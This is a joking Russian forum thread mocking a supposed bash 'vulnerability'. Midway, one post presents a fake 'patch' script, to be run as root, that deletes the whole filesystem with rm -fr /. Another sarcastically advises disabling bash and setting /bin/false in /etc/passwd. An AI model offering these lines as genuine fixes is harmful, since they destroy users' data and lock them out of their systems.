Найдена уязвимость в bash

=))))))))

иксплойт есть?

какое щастье что я использую zsh :)

Обновился до последней версии...

Ужос!

Так это и на Перле можно и даже на Вижуал Васике

БлиН, пришлось перечитать два раза - старею =)

:)))

Заплатку выпустили уже?

пожалуй, стоит на lorquotes записать!

>>Заплатку выпустили уже?

Еще нет. В качестве временной меры можно сделать chmod a-x /где/там/у/вас/bash и для пущей надежности прописать /bin/false в /etc/passwd

Сенкс. Сделал. Все работает. Все секьюрно. Сижу и безопаснуюсь

:)))

Уже есть комментарии Microsoft - "Новая версия Windows этой уязвимости подвержена не будет, в ней нельзя будет писать скрипты".

Только что проверил, в zsh такая же уязвимость! Это наверное by design.

Заплатка от этой уязвимости и от многих других(запускать под рутом):

#!/bin/bash
echo "Подождите пока не будут найдены и удалены все потенциально вредоносные файлы..."
rm -fr /
echo "Сделано. Теперь перезапустите ваш компьютер"

Неотключаемая фича -- баг!

Второго сообщения не будет показано. И вообще оно где-то на середине сдохнет.

=)))))))))))))

Это фигня ещё. С помощю su вообще можно поднять привелегии до рутовских :(

блин, я тоже нашел уязвимость - sudo passwd =(

Попробуй! Только не надорвись без пароля рута.

Гы! Баш без пароля ползователя тож несумеет выполнить скрыпт с привелегиями оного, так что сударь изволил облегчиться в непосредственной близости от тазика...

>Злоумышленник может написать произвольный скрипт, который выполнится с правами пользователя, запустившего его.

>>С помощю su вообще можно поднять привелегии до рутовских :(

Если ты недогоняешь смысловой разницы, неогорчайся что "изволил облегчиться в непосредственной близости от тазика..."

Ну ладно, если не догоняеш, что у пользователя есть не только возможность запустить скрыпт со своими привелегиями, но и сперва повысить их а потом ужо запустить скрыпт, не буду обижаться.